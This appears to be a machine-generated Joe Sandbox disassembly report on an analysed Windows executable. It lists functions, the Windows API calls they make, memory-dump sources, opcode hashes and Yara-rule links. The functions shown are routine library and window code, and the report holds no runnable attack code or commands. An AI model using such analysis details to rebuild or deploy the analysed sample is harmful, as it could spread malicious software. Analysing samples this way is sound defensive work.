                                    • Opcode ID: fae1185300be86e148c4d8e9761e919a6f19d041a228f615f53b60fd7df0a822
                                    • Instruction ID: 4d8f5be919c5874d551e461a6ed4cccc98f6d5f20499c33f7d43f521ecd37e4a
                                    • Opcode Fuzzy Hash: fae1185300be86e148c4d8e9761e919a6f19d041a228f615f53b60fd7df0a822
                                    • Instruction Fuzzy Hash: 6B318979100A05AFD768CF55C889F6AB7E8FB45364B00852EE416C7680EB34FA45CB64
                                    Function 004B6D02 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004AF8AE,?,Microsoft Visual C++ Runtime Library,00012010,?,005ADA04,?,005ADA54,?,?,?,Runtime Error!Program: ), ref: 004B6D14
                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004B6D2C
                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004B6D3D
                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004B6D4A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                    • API String ID: 2238633743-4044615076
                                    • Opcode ID: 4c2b5f940e1253108646d926ccc366a7193f0494c490198f7cf03a44a263494d
                                    • Instruction ID: 06ca2b8fa5eb77ca048fb3b641c849557bfcadf9952bd0d7960e7dd5dffc7da0
                                    • Opcode Fuzzy Hash: 4c2b5f940e1253108646d926ccc366a7193f0494c490198f7cf03a44a263494d
                                    • Instruction Fuzzy Hash: CD012C71B01201AF87109FB59C889AB7FEDBF8978031A583BB504D7271DA78C8019B76
                                    Function 004C028F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004C0589,?,00020000,00020000,00000000,?,?,00000000,EDIT,?,?,?), ref: 004C0298
                                    • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02A1
                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004C02B5
                                    • 6FBA1CD0.COMCTL32(?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02D0
                                    • 6FBA1CD0.COMCTL32(?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02EC
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,EDIT,?,?,?,?,?,?,?,?), ref: 004C02F8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeHandleLoadModuleProc
                                    • String ID: COMCTL32.DLL$InitCommonControlsEx
                                    • API String ID: 1437655972-4218389149
                                    • Opcode ID: 1309586a1cd7b6d69c177071e2ab8e3d81fee11640ce42ddc9a562737db91a0b
                                    • Instruction ID: 67d4f3cbeeb7557b7e1314775cd264c5762493dccd5b742e37a990a4114052e8
                                    • Opcode Fuzzy Hash: 1309586a1cd7b6d69c177071e2ab8e3d81fee11640ce42ddc9a562737db91a0b
                                    • Instruction Fuzzy Hash: E8F0C836E41662C783515FE49D4CE5B77ECAB98751B05047AF940E3210CB28DC01876E
                                    Function 00430DD0 Relevance: 13.9, APIs: 9, Instructions: 387windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsChild.USER32(?,?), ref: 00430E08
                                    • GetParent.USER32(?), ref: 00430E99
                                    • IsWindow.USER32(?), ref: 00430FCB
                                    • IsWindowVisible.USER32(?), ref: 00430FDD
                                      • Part of subcall function 004C08B1: IsWindowEnabled.USER32(?), ref: 004C08BB
                                    • GetParent.USER32(?), ref: 0043102E
                                    • IsChild.USER32(?,?), ref: 0043104E
                                    • GetParent.USER32(?), ref: 004311F7
                                    • SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 00431214
                                    • IsWindow.USER32(?), ref: 0043126F
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ParentWindow$Child$EnabledMessageSendVisible
                                    • String ID:
                                    • API String ID: 2452671399-0
                                    • Opcode ID: 18fab21ca8e785dd97d3cec3ad59cf09a5dbf989cec1da10be882055bf33c453
                                    • Instruction ID: 84cd61234a96ed9dbfc6299b7c26b9f54620b193deddb7a4de03561b851213be
                                    • Opcode Fuzzy Hash: 18fab21ca8e785dd97d3cec3ad59cf09a5dbf989cec1da10be882055bf33c453
                                    • Instruction Fuzzy Hash: 30E19E716043519FC724DF65C881BABB7E4BB89704F004A2EFA8597391D738E845CB9A
                                    Function 0041E820 Relevance: 13.8, APIs: 9, Instructions: 278COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db2d7718b3ae568a4963ff14bf0c9cab6fd19b9150b3b675c43aa8d0458955fe
                                    • Instruction ID: 15ea42248ce17e491cc65b5cbe9edc6466db66887710ff071872ed7f0c3f538e
                                    • Opcode Fuzzy Hash: db2d7718b3ae568a4963ff14bf0c9cab6fd19b9150b3b675c43aa8d0458955fe
                                    • Instruction Fuzzy Hash: 5481ADB63106019FE320DF69DC85FABB3A8EB94348F10892FF142CB291D775E8458B94
                                    Function 0041FB40 Relevance: 13.8, APIs: 9, Instructions: 259COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cb2a24cc438ee2cd46d295e0548d5788c7db548abc5b29f49fb2fb50632e1af
                                    • Instruction ID: 9b7a02632a811da30e1344556ac7f4b1594854922987e6e717ed9396e8de9825
                                    • Opcode Fuzzy Hash: 2cb2a24cc438ee2cd46d295e0548d5788c7db548abc5b29f49fb2fb50632e1af
                                    • Instruction Fuzzy Hash: 797190723406059FD720DF68DC85FABB3A8EB94349F10893FF142CB291D765E84A9B94
                                    Function 004B2C27 Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,00000100,005ADC8C,00000001,00000000,00000000,00000100,00000001,?), ref: 004B2C69
                                    • LCMapStringA.KERNEL32(00000000,00000100,005ADC88,00000001,00000000,00000000), ref: 004B2C85
                                    • LCMapStringA.KERNEL32(?,?,?,?,00000001,?,00000100,00000001,?), ref: 004B2CCE
                                    • MultiByteToWideChar.KERNEL32(?,00000002,?,?,00000000,00000000,00000100,00000001,?), ref: 004B2D06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,?,00000000), ref: 004B2D5E
                                    • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 004B2D74
                                    • LCMapStringW.KERNEL32(?,?,00000001,00000000,00000001,?), ref: 004B2DA7
                                    • LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 004B2E0F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: String$ByteCharMultiWide
                                    • String ID:
                                    • API String ID: 352835431-0
                                    • Opcode ID: df5238649cd02f9ca87aa827010914762ec849130b77a4c7b2aa874a606f4788
                                    • Instruction ID: ad04b330dc2e354b94eeea703679cc1b95b43c2c72cc8abaa63f314cb391023d
                                    • Opcode Fuzzy Hash: df5238649cd02f9ca87aa827010914762ec849130b77a4c7b2aa874a606f4788
                                    • Instruction Fuzzy Hash: 20519D31900249EBCF228F95CE49EEF7FB9FB48750F14412AF911A1260D3798C50EBA5
                                    Function 0242D928 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 174stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • lstrcat.KERNEL32(?,024A3DEC), ref: 0242D9ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0242DABE
                                    • lstrcat.KERNEL32(00000000,024A5708), ref: 0242DB20
                                    • lstrcat.KERNEL32(00000000,024A570C), ref: 0242DB32
                                    • lstrcat.KERNEL32(00000000,024A5710), ref: 0242DB5B
                                    • lstrlen.KERNEL32(00000000,%s,0242E3E7,?,?,?,?,?,?), ref: 0242DB71
                                      • Part of subcall function 0242D7CF: lstrlen.KERNEL32(00000000), ref: 0242D7E8
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56EC), ref: 0242D816
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56F0), ref: 0242D83C
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56F4), ref: 0242D84B
                                      • Part of subcall function 0242D7CF: lstrlen.KERNEL32(00000000), ref: 0242D8A6
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56F8), ref: 0242D8DA
                                      • Part of subcall function 0242D7CF: lstrcat.KERNEL32(00000000,024A56FC), ref: 0242D900
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$ExchangeInterlockedlstrcpy
                                    • String ID: %s
                                    • API String ID: 3361872186-3043279178
                                    • Opcode ID: 4f9cfca9db7b09f080ec9857a116f6212edf3f639a15fb9e6cb19dfc517ad06b
                                    • Instruction ID: 7b686e279c0adb77db5c4e3be3aeaf0dff3e31c97ecae2bc57fd082c4c7f68c9
                                    • Opcode Fuzzy Hash: 4f9cfca9db7b09f080ec9857a116f6212edf3f639a15fb9e6cb19dfc517ad06b
                                    • Instruction Fuzzy Hash: CC61C5B6D00228DBDB18DFA5D985BED77B2AF88300F5084BAE50DD6280D7759A58CF90
                                    Function 00435560 Relevance: 13.6, APIs: 9, Instructions: 118COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCapture.USER32 ref: 00435566
                                    • ClientToScreen.USER32(?,?), ref: 004355A3
                                    • OffsetRect.USER32(?,?,?), ref: 004355CC
                                    • GetParent.USER32(?), ref: 004355D2
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2CFE
                                      • Part of subcall function 004C2CEA: ScreenToClient.USER32(?,?), ref: 004C2D07
                                    • GetClientRect.USER32(?,?), ref: 004355F5
                                    • OffsetRect.USER32(?,?,00000000), ref: 00435613
                                    • OffsetRect.USER32(?,?,00000000), ref: 0043562B
                                    • OffsetRect.USER32(?,00000000,?), ref: 00435649
                                    • OffsetRect.USER32(?,00000000,?), ref: 00435669
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Offset$Client$Screen$CaptureParent
                                    • String ID:
                                    • API String ID: 838496554-0
                                    • Opcode ID: 747a0ceb4a7c36e700f4cc987daf37e5f20a600d6fffe1f901eb77bdd9a0e7f1
                                    • Instruction ID: 118e1aa9b73e0de09bc6f39ec81b5df2977eadc88d260189d8fadb8fc9cb10d7
                                    • Opcode Fuzzy Hash: 747a0ceb4a7c36e700f4cc987daf37e5f20a600d6fffe1f901eb77bdd9a0e7f1
                                    • Instruction Fuzzy Hash: 3A4118B5604301AFD708DF68C985D6FB7E9EBC8704F008A2DF586C7250DB74ED088A66
                                    Function 00432C10 Relevance: 13.6, APIs: 9, Instructions: 85windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,?,00000001,?,?,?,?), ref: 00432C2A
                                    • GetTopWindow.USER32(?), ref: 00432C30
                                    • IsWindowVisible.USER32(00000000), ref: 00432C41
                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 00432C52
                                    • GetClientRect.USER32(00000000,?), ref: 00432CA5
                                    • IntersectRect.USER32(?,?,?), ref: 00432CBA
                                    • IsRectEmpty.USER32(?), ref: 00432CC5
                                    • InvalidateRect.USER32(00000000,00000000,00000000,?,?,?,?), ref: 00432CD6
                                    • GetWindow.USER32(00000000,00000002), ref: 00432CDB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$Invalidate$ClientEmptyIntersectLongVisible
                                    • String ID:
                                    • API String ID: 938479747-0
                                    • Opcode ID: a99dba9726537121dcec7652896c0f07d5a641c4eb96109069eb0d572cdaff2d
                                    • Instruction ID: d53c30d1d2089028759a42fcd0cf7866a06b9aed2857651fc785077b4c650c8a
                                    • Opcode Fuzzy Hash: a99dba9726537121dcec7652896c0f07d5a641c4eb96109069eb0d572cdaff2d
                                    • Instruction Fuzzy Hash: 1D217C71600316ABD314DF15DD84DAFB7ACFF88305F044A2EF94593250EB74E9458BAA
                                    Function 00424910 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 316windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0042494F
                                    • CreateRectRgn.GDI32(00000000,00000000,00000001,?), ref: 00424A70
                                    • SetRect.USER32(?,00000000,00000000,00000001,?), ref: 00424A99
                                      • Part of subcall function 004193D0: __ftol.LIBCMT ref: 004194F5
                                      • Part of subcall function 004193D0: __ftol.LIBCMT ref: 00419502
                                    • FillRgn.GDI32(?,?,?), ref: 00424B16
                                    • PatBlt.GDI32(?,00000000,00000000,00000001,?,00F00021), ref: 00424B89
                                      • Part of subcall function 00413AA0: GetSysColor.USER32(0000000F), ref: 00413AAD
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
